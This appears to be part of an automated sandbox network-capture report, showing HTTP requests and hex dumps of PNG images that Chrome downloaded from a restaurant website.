                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 7e 00 61 65 e9 7c e0 15 f6 ff f8 38 fd 55 31 aa 2f 68 61 c7 ab 5b 99 36 28 b9 68 ee 02 a2 73 d3 6c ab 6c a3 6a 5e 2d b5 97 a5 c9 eb 05 42 7a 2d c5 01 93 e1 e3 0a 56 af cd a4 86 24 71 2d 47 a7 08 b8 e8 43 6b d8 db dd 08 c6 30 28 25 b0 e2 a8 d8 34 b4 05 2c 1f 3d 85 95 d3 5a 59 b5 30 ce d8 31 2a 15 2c 32 5a 82 13 a2 96 5c 90 60 aa 9a a4 75 72 0b 1b 8e 1d e3 d3 9f bd 9b 7d 6f 1d 41 95 69 e2 9e 4f 48 b8 64 7d 1f 0b 9b ba 64 88 45 6d 8d bc 6b ca 78 16 37 d4 91 50 21 5e b6 48 0c 97 a0 21 c9 9f 7b 87 79 ff 23 2f 73 41 4b 23 37 ac 9a c9 03 7b b7 f2 d8 d1 21 02 3b 8d e1 0b e6 55 09 7e 72 f5 78 26 b3 1d 5d 0b 28 e8 0d 1c f7 e3 3c f6 52 17 e9 d4 18 e6 85 4b cc ae 1a 24 53 b1 e8 9d 79 f6 81 95 b7 3f 11 16 42 f9 47 f5 73 97 7c df 1f 56 55 b5 e5 9d df 87 76 ec de fd f6
                                                                                                                                                    Data Ascii: ~ae|8U1/ha[6(hsllj^-Bz-V$q-GCk0(%4,=ZY01*,2Z\`ur}oAiOHd}dEmkx7P!^H!{y#/sAK#7{!;U~rx&](<RK$Sy?BGs|VUv
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 67 15 1f bc fd 33 d4 4c 98 cb 71 27 4d 3c 16 a6 73 4f 2b bb 1e 58 4e 50 09 91 93 5d c8 65 29 f4 24 14 59 23 2b 40 f6 3c 10 12 1e 12 de 2b 37 4f 28 82 b8 c8 e0 79 59 7c 8a 47 26 03 c7 4d 1b 7c 51 ea 55 98 e1 b7 99 33 7c 38 75 c3 eb 71 35 95 4d 47 4f 70 e7 aa 3f 73 70 20 4e 07 32 09 34 90 2c 84 27 90 3d 83 b1 e1 12 86 54 95 a2 a4 12 14 68 7e 82 5a 00 5f 89 49 69 a0 8c 68 c1 60 7e fe d2 7a 5a db 33 10 f4 91 37 4d 5c 5c a6 17 85 a8 57 25 5c c3 26 2b bb e4 73 16 13 97 5c 70 52 48 ef 3c fe fc 95 fd fb 8e 13 e7 fa cf 37 e8 23 f7 bf bf 37 72 f2 d9 61 85 4a 8e 3c 1a 71 b5 8e 0f ff b4 99 d5 9d 85 68 7a 21 31 63 3f 0e 26 a3 47 55 71 cd 79 33 19 5e d4 86 99 39 c9 40 37 18 29 1f ae e9 c7 15 12 b6 64 21 54 13 4f ae e2 68 a7 ce 03 1b 36 d2 eb d9 a7 dd 47 1b 54 1b 5c 4f
                                                                                                                                                    Data Ascii: g3Lq'M<sO+XNP]e)$Y#+@<+7O(yY|G&M|QU3|8uq5MGOp?sp N24,'=Th~Z_Iih`~zZ37M\\W%\&+s\pRH<7#7raJ<qhz!1c?&GUqy3^9@7)d!TOh6GT\O
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 41 6a 01 a0 8c d0 20 89 c7 77 37 af e6 81 c3 95 cc 9f 32 91 b6 8a 08 01 d7 41 cd db 64 33 1e db 3b 7b d8 94 19 60 8b 4c 1d f1 4a 7c 8b 08 26 9a 1f c4 16 3e 32 28 11 e5 02 63 82 92 09 53 aa 38 b5 cd e0 ec 8a 2a 46 87 0d 02 35 71 8c 40 13 1c aa 44 dd 19 46 11 3b 18 72 f7 20 bc 31 18 7a 94 66 57 32 29 6d 32 5e 6a a8 53 c6 f0 4e 7f 16 55 bd 03 94 4a bd ec 50 04 7f b6 92 0c 86 6c fa 0b 92 cf fc fa 5e aa 4e 69 e2 d2 73 e7 20 53 03 08 cf 47 a8 1a 96 f4 70 34 0d 5f f8 04 3d 8f fc 40 1f b6 a8 ca ff b3 03 fb d8 b2 c7 b6 21 c4 88 db a8 5d 70 e1 85 ab 2a 2a 2a ce 38 96 07 fd a1 1b de 17 7c b1 99 e8 31 8f 35 7f c1 82 2d 86 61 9c 68 da 98 bf 69 d3 a6 1d 67 2c 3d eb ac 0f dc 70 c3 9a af 7d e5 ab b9 57 d9 c6 cd f9 e6 d7 6e 1a 51 23 8d b1 e3 c6 1d 32 0c e3 25 7a e6 e9 a7
                                                                                                                                                    Data Ascii: Aj w72Ad3;{`LJ|&>2(cS8*F5q@DF;r 1zfW2)m2^jSNUJPl^Nis SGp4_=@!]p***8|15-ahig,=p}WnQ#2%z
                                                                                                                                                    2024-10-01 04:26:30 UTC16336INData Raw: 05 ab d7 af 7d 61 f1 48 e2 ae dd 5d 5d 33 ce 39 eb 0c 6f c1 fc 05 cf 5f fb 8e 77 14 a6 4c 9d 9a 88 c5 e2 35 8a a2 e8 be ef 3b 85 7c 7e b8 bd bd 3d bd ea b9 95 fe 6f 7f f3 eb f1 96 65 9d f3 cf 3c 07 12 59 78 76 c5 aa c1 aa aa aa f6 1f fc f4 27 a7 2e 5a b0 f0 73 b3 66 cc 18 ad eb fa 89 e8 7c f8 df fd e1 0f d7 7e e1 2b 5f 3e 53 8d c5 35 c5 71 fc 33 97 9c f1 ec da b5 eb 66 f6 f5 f7 6f 6d 6a 6c 3c a6 f2 63 2e 97 3b d6 c8 b8 81 40 e0 a5 40 a8 eb 7a af 38 c1 9d 73 de f9 07 85 10 c7 ec 71 2a b4 b1 93 2d 4e d9 e4 99 fb 66 67 dc 14 a1 e6 d9 3c f0 7c 3b 1f bb eb bb 34 46 43 4c a9 6f 42 eb 1b c2 2c 16 68 69 aa 41 8d 86 50 ca 02 2b 27 59 35 d8 8b 65 98 8c 0a 05 e8 29 67 d8 1e 2a b0 d9 93 64 3a 4b 5c 7f ca 04 f4 ea c3 c4 fb d2 e8 9d d0 68 8e 61 74 7c 34 89 c2 3e 44 a9
                                                                                                                                                    Data Ascii: }aH]]39o_wL5;|~=oe<Yxv'.Zsf|~+_>S5q3fomjl<c.;@@z8sq*-Nfg<|;4FCLoB,hiAP+'Y5e)g*d:K\hat|4>D
                                                                                                                                                    2024-10-01 04:26:30 UTC48INData Raw: ce fb 78 e5 fb 3f c9 c7 bf f6 59 16 ca 43 f8 d1 71 5a c3 a3 70 b2 82 23 d2 cc c4 4a 24 08 38 de 6a 32 71 ee 85 bc f4 6f bf c8 df ff ed 27 28 3f
                                                                                                                                                    Data Ascii: x?YCqZp#J$8j2qo'(?
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 76 03 0b 42 97 62 18 10 d3 0d ba 6c c1 d9 03 03 dc bc 6f 27 4a 37 a9 2b 18 23 a4 db 4a d0 0a 03 6e 69 cd d0 70 3d d6 62 d3 95 c8 61 6b 26 95 5a 83 ba e6 81 e6 90 0e 0c 2c 69 e0 45 0a 2b 52 c4 80 96 1e a2 63 a0 b9 75 94 e1 e2 c5 2c 64 cb e2 9c 64 3b 1b 73 19 ee 28 cf f0 54 a3 84 a7 19 c4 b0 d0 65 84 8c a2 a7 e3 d8 83 16 7f b6 64 11 33 4b fa 18 73 67 30 b5 90 b4 e7 62 d7 2a 44 8d 1a 08 9b 6a 50 61 d3 e5 57 cd 9c 41 d8 19 a0 ff cf 9b 73 c3 65 ee 93 3f ca 11 37 a6 88 6b 2d 8c d6 69 36 f4 f6 b1 7e 5e 12 1d 89 13 4c 91 b2 2d 7e f8 c8 18 e5 a1 13 84 56 17 81 a5 81 2b 59 5a cc f3 99 73 af 66 fb 83 f7 52 bb f2 15 fc 64 d2 e3 f1 83 37 51 2e ed 85 94 81 26 3a b0 6a 82 d0 50 44 04 88 56 1c 9d 02 51 d2 27 f0 c6 79 fe ea 76 fe 74 53 1b 62 ff 31 84 96 81 4c 8a 89 56 8a
                                                                                                                                                    Data Ascii: vBblo'J7+#Jnip=bak&Z,iE+Rcu,dd;s(Ted3Ksg0b*DjPaWAse?7k-i6~^L-~V+YZsfRd7Q.&:jPDVQ'yvtSb1LV


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    23192.168.2.449770162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC384OUTGET /assets/imgs/cook_dessert.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 73690
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:30 UTC5499INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22
                                                                                                                                                    Data Ascii: <?xpacket end="w"
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 30 d8 84 c5 e5 81 84 d5 98 75 39 91 12 21 04 42 c8 1a 56 63 0c d6 65 2e 49 08 2d 21 09 5a 19 9c b5 18 6b 41 29 42 08 f8 10 73 e3 47 c2 5a 95 f1 e2 24 28 97 b3 fd ba 08 4d 03 be ac 87 5a 1d 95 18 8f 6b 6c 61 e9 56 1d cb f9 2a 73 95 8b 86 c2 1a 84 8a de 1b 18 6e 10 3d 1c 12 35 70 3f 6f 33 e1 04 a3 84 da 69 0a 63 f0 5d a4 f7 1d 22 0a ad 07 41 81 d6 98 81 ff 92 bc 27 49 8f b6 0a 57 1a c4 43 51 16 6f 34 4a 7e 4c 2b d9 01 f9 1f 44 71 99 a1 6c 92 df 8b 01 7d e7 8b 4a 32 40 f2 4a bf 5b 13 ff 02 8a 6f 40 2b 92 1e 14 cb 41 a3 55 02 9d 2f c6 c2 16 e0 02 7e 00 f2 65 60 26 a9 13 02 b9 21 46 4b a1 0b 42 1f f8 e4 47 3e 8c 92 9e 6f f9 a1 1f e3 1b fe f4 7f c1 9b 3f f8 87 78 ea 57 7e 9a 7f f2 77 ff 06 97 9f 7b 85 dd 33 9e 7a 3c 42 69 03 08 21 c5 0c e0 8a 10 42 46 14 ac 75
                                                                                                                                                    Data Ascii: 0u9!BVce.I-!ZkA)BsGZ$(MZklaV*sn=5p?o3ic]"A'IWCQo4J~L+Dql}J2@J[o@+AU/~e`&!FKBG>o?xW~w{3z<Bi!BFu
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 8e f7 f6 99 1d 1d 82 f4 34 a3 82 87 1e b8 c0 7b be e6 6d fc 81 77 bf 83 fb ee be c0 aa eb 38 3c 3c a6 f7 3d 9b 5b 5b ec 9e 3a 4d e7 03 3f fd f7 7f 9a 17 9f 7b 89 fb cf 99 ec da df 79 44 18 56 0a bb bc 4d de 66 92 95 49 59 35 b1 7b fe 5e 76 cf 9f 83 98 bd 3c 24 25 18 06 09 c6 64 9c 39 ac b2 2d 18 69 18 1c 0d 6f ba 24 41 19 f9 bc 62 fb 93 ec 33 50 25 35 99 0b 63 4c 84 b0 4f 8a 7b 08 c7 60 3a b4 6e 30 7a 17 49 63 34 0d 55 dd 60 77 b6 39 5c 5e 25 a4 44 39 d9 a4 5c 1c b1 3a b8 45 8c 91 18 33 1f 45 29 c3 fe c1 3e 31 26 9a f1 98 b6 8f 88 4e d4 e3 2d aa aa 64 79 63 c5 8d e7 3f 85 de ff 05 cc e4 9d 4c 1e 7c 3f f2 e8 b7 61 9d 66 fe fc 87 38 9a bd 48 a8 c6 2c 2b e1 70 14 a8 cc 06 5e 6a 2a d3 70 66 f7 0c c4 8e 6b 37 6e 32 da 3e c7 d6 99 92 97 9e fe 28 37 6e bc c2 03
                                                                                                                                                    Data Ascii: 4{mw8<<=[[:M?{yDVMfIY5{^v<$%d9-io$Ab3P%5cLO{`:n0zIc4U`w9\^%D9\:E3E)>1&N-dyc?L|?af8H,+p^j*pfk7n2>(7n
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 31 f9 b2 83 9f 04 81 c4 db 06 5b 55 78 6b 11 aa 6b 13 48 d9 6d 6b 77 17 46 81 56 01 4a a9 ee d2 e0 1b 82 58 91 46 7d 06 bd 21 1e cf 72 99 b3 cc 73 8c 77 0c c7 63 b2 7e 8f 28 8e 3a 7b 95 6b 31 56 52 56 15 4a 6b fa 83 01 c3 c1 80 f6 dc 37 28 14 0c fa 3d 22 d7 41 13 9d 10 44 bd 21 fa 71 ea 93 96 2c 51 8c 86 09 5b 7b eb 8c 57 46 e7 31 51 f5 64 e2 f7 7e 75 dc 89 d5 c5 53 14 d2 0f 8c bd e9 76 24 3b 67 b3 a4 f5 0e d3 2c 69 cd 0c d3 9e 51 14 9e 20 1b 52 17 25 ef fc e6 2b 34 75 c3 0b 9f 7d 96 0b cf ac 23 03 45 e5 43 4e 0e 67 bc f5 95 fb 0c af 3e c7 8d 97 7e 00 39 bc ca c1 a4 a4 6e 96 9d d4 bd 28 68 4e 66 94 a7 f7 69 ce ee e2 ab 19 a6 5a 50 4c 0e 68 26 fb 88 b6 20 a2 53 cb e9 d8 13 f4 22 06 2b 09 82 14 3f 1b 90 68 85 6c 1b 94 6d 59 1b a7 38 1a 1a 5f 50 96 0b 7c 5d
                                                                                                                                                    Data Ascii: 1[UxkkHmkwFVJXF}!rswc~(:{k1VRVJk7(="AD!q,Q[{WF1Qd~uSv$;g,iQ R%+4u}#ECNg>~9n(hNfiZPLh& S"+?hlmY8_P|]
                                                                                                                                                    2024-10-01 04:26:30 UTC3007INData Raw: 3a b0 f6 87 7f ce 6f 3d 41 bb 1f 5a f2 42 0a b0 96 ba aa 8e 9c e3 f7 ba 9d ce cb 95 d6 4f 57 c6 fd 72 ba 48 7f 36 4d 0b f2 7c 81 14 d0 8a 63 e4 a9 b5 b3 ae 35 55 55 83 16 44 41 82 0a 3a d4 d2 47 38 83 d2 15 c6 18 9c 1f 22 fc 10 e7 47 d4 78 54 56 62 85 87 52 cd 76 ba 13 12 61 9a 26 8a 14 11 c2 96 08 5d 22 85 87 f4 23 9c 74 54 e5 04 33 ab 29 6a 45 59 37 99 df 39 0b 56 21 09 31 c6 c7 3a 9f a5 e5 15 c6 ae e6 ee ed 3d b6 a7 13 3a fd 11 96 21 fb c7 25 41 a2 19 0c 7c 44 3c a2 d5 cd b0 f9 01 07 af 3e c3 c1 f1 14 9d a7 78 ce 63 1e ee 70 b2 ff 1a 22 4e 10 aa 43 bb 3d 22 f1 25 a5 29 29 cd 02 16 9a a0 90 a8 54 12 48 83 58 d3 c8 20 c0 64 fb d4 3b af e2 ee 5d 67 dc 1d b0 fc f0 47 58 5f db 64 fc ce 73 8c 97 b7 78 f9 4b 9f 46 74 47 e4 d1 45 6a ad d8 bb 71 8d ed 6b 37 71
                                                                                                                                                    Data Ascii: :o=AZBOWrH6M|c5UUDA:G8"GxTVbRva&]"#tT3)jEY79V!1:=:!%A|D<>xcp"NC="%))THX d;]gGX_dsxKFtGEjqk7q


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    24192.168.2.449768162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC383OUTGET /assets/imgs/cook_dinner.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:30 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:30 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 84519
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:30 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:30 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b4 00 00 00 b4 08 06 00 00 00 3d cd 06 32 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR=2pHYs?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:30 UTC5499INData Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22
                                                                                                                                                    Data Ascii: <?xpacket end="w"
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: c5 e3 84 68 18 98 24 a2 29 c2 40 20 34 45 10 d8 28 20 91 88 b3 d7 ec 34 b9 be 9d fc f4 cb 9f 60 5b cf 20 d7 7f e3 ab e4 aa e0 88 56 16 1c 73 fe 8d 7d eb a6 2e 2d af 7b fa 6c 3b b7 b9 fc 8f 48 c4 fe 7f 5e 72 28 a5 30 0c 03 a1 69 64 7b 7a f5 f3 af bb f6 81 f9 17 9d 7d e3 55 5f fc 08 b9 e1 6d 4c 89 9b 04 41 88 2a bb 58 4a a7 29 93 40 37 3c 4a d5 02 23 a3 a3 d4 65 12 2c 9a bb 98 3f de f9 7b c2 7c c8 a4 59 d3 19 1b cd b3 6d e5 06 5e 7c f2 55 a6 77 cc e1 0b 9f fc 16 a7 1e 73 21 53 3a 9a b8 fa e2 2b 58 fb e2 06 d2 b9 38 5a 29 4a 18 17 60 15 99 d5 da 82 ed 2b 7a 2b 2e 57 7e fe 3a e6 cc 9a 4a 77 4f 1f 52 48 ca fd c3 f4 0d 14 a8 6f 9c c1 f9 57 7d 85 63 4e 3c 9b 68 3e 49 79 6b 91 7b 6e fd 11 3f be e5 12 9e 78 e1 7e de db d8 8d b2 62 a4 1b 1b b0 b3 25 b2 03 a3 68 d2
                                                                                                                                                    Data Ascii: h$)@ 4E( 4`[ Vs}.-{l;H^r(0id{z}U_mLA*XJ)@7<J#e,?{|Ym^|Uws!S:+X8Z)J`+z+.W~:JwORHoW}cN<h>Iyk{n?x~b%h
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: ed 67 3c f9 d8 03 6c 7d ef 6d 84 57 a1 be 3e 45 43 43 9a 64 c4 c4 2b 57 28 96 ca 38 08 0c c3 c0 32 0c ca 95 0a 42 08 5c cf a1 5a b5 b1 74 03 15 86 94 6d 1b a1 69 c4 13 71 4c cb 24 1e 89 e2 7b 1e 56 22 85 6f 5a 38 6e 80 a7 22 68 56 0c bb 32 86 a1 d5 70 6f a1 69 b5 5d 81 a1 24 0c 42 34 15 d2 37 d0 c7 f6 a1 22 7b 2e 3d 9c 6b ae ff 15 97 7c e2 1a 44 a4 81 7c d5 21 19 4f b2 61 d5 2a 86 86 86 68 6b 6b 27 62 45 d9 b1 63 3b 76 b5 c4 61 87 1f 46 21 5f 46 08 8d aa eb 53 ae 3a 94 ab 36 e5 8a 8d eb ba 78 be 4f 18 aa 0f 54 e1 72 9c 42 20 c6 dd f0 a5 10 35 fe b6 a6 13 ab 13 bc f7 c2 6d e4 d6 bd 4a 43 c6 63 7a e7 6c 06 87 0a 98 96 4b 3a 11 81 c0 a9 8d cb 2d 49 68 44 89 c6 5b 30 84 62 b0 37 8b 69 4a 8c 88 42 0f 15 9a a3 78 eb 8d b7 69 9e d8 c9 ac 05 07 50 ac 0e 23 54 58
                                                                                                                                                    Data Ascii: g<l}mW>ECCd+W(82B\ZtmiqL${V"oZ8n"hV2poi]$B47"{.=k|D|!Oa*hkk'bEc;vaF!_FS:6xOTrB 5mJCczlK:-IhD[0b7iJBxiP#TX
                                                                                                                                                    2024-10-01 04:26:30 UTC16384INData Raw: 91 5a a0 2a 8d df f0 71 7c 87 79 b2 20 57 09 8e 2c 71 4c 81 25 0a 94 ad 98 17 73 42 a7 c9 df fd c1 7f ca 9f f9 fa ef e5 b5 af 78 1b 7f f2 1d df c3 8f fd d0 bf 60 73 ed 76 b6 77 0f 69 b5 bb bc fb 9d 7f 06 c7 6a 30 9d 1e 23 ac 12 df f5 10 c2 a9 09 a0 08 b2 bc a4 3f 58 02 cb e2 78 38 24 2f 6a 64 41 a7 d9 c2 32 02 cf b1 51 79 8a 17 46 4c e7 90 8e 0f 59 6e 38 24 71 46 b3 d9 c2 8d 02 b4 d1 35 bb c1 28 a4 ac cb 04 81 17 b0 98 ce 10 a5 46 55 f0 c2 f5 6b 08 09 9e ef d6 e5 78 55 d5 de 3f 34 16 25 b6 a5 80 92 aa 4c 28 cb 09 5a c7 60 0a 34 06 db 0f d1 f1 88 bb 1e 7a 23 df f1 0f 7e 9e a8 b3 cc c1 d1 2e 83 e5 36 55 91 9f 5a a3 2c 50 8a 24 8e 59 c4 0b 8a b2 60 3a 9d 52 6a 45 73 75 99 b0 dd e4 15 77 dd c1 ec e6 0d 7e f2 47 7f 88 50 ba dc fb 8a d7 b0 73 18 93 65 09 45 9e
                                                                                                                                                    Data Ascii: Z*q|y W,qL%sBx`svwij0#?Xx8$/jdA2QyFLYn8$qF5(FUkxU?4%L(Z`4z#~.6UZ,P$Y`:RjEsuw~GPseE
                                                                                                                                                    2024-10-01 04:26:30 UTC13836INData Raw: 38 7a c2 63 df 94 c2 b7 2e 83 a1 c4 37 09 07 f6 5f 44 67 73 95 d1 20 60 63 35 a7 36 91 50 a4 29 d3 0b 93 88 3c 65 66 bb 83 f5 03 4e 9e 5e a5 bb 69 09 eb 1a 11 5a 4a ed 10 d4 7c 26 a6 bb 2c 16 23 6e 3f 36 e2 a2 8d 90 c2 24 bf e7 39 ac 49 f9 a5 cd 35 ff c9 8d 95 f7 bf f3 0f 10 d6 7c 99 6d 09 82 90 47 ee be e5 c4 fc 85 37 3e 67 6a c7 8e 1d c3 9e 66 ef 9e fd 3c e9 29 d7 72 f5 0d 4f 66 fb ee 7d 18 37 a4 33 e8 72 ea c4 31 ba ab 4b d4 64 41 a4 24 35 bf 86 23 a0 48 2a 83 79 a1 1c a2 28 c2 96 25 a3 38 21 2f 4a 82 20 a4 d0 15 c1 d3 73 5d a4 b0 e8 a2 a8 64 a3 41 58 09 88 50 14 45 81 eb 48 74 5e 90 26 71 e5 92 22 e5 13 42 a5 ea 12 e8 e2 fb 21 42 48 8a b2 44 58 b0 45 09 a6 e2 50 97 54 da 6a 57 aa b1 5e 1a 3c df 27 2f 8a aa 91 e3 ba c8 b1 b0 c8 6a 43 99 e7 2c ad 77 b8
                                                                                                                                                    Data Ascii: 8zc.7_Dgs `c56P)<efN^iZJ|&,#n?6$9I5|mG7>gjf<)rOf}73r1KdA$5#H*y(%8!/J s]dAXPEHt^&q"B!BHDXEPTjW^<'/jC,w


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    25192.168.2.449775162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:30 UTC630OUTGET /assets/imgs/icon2.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
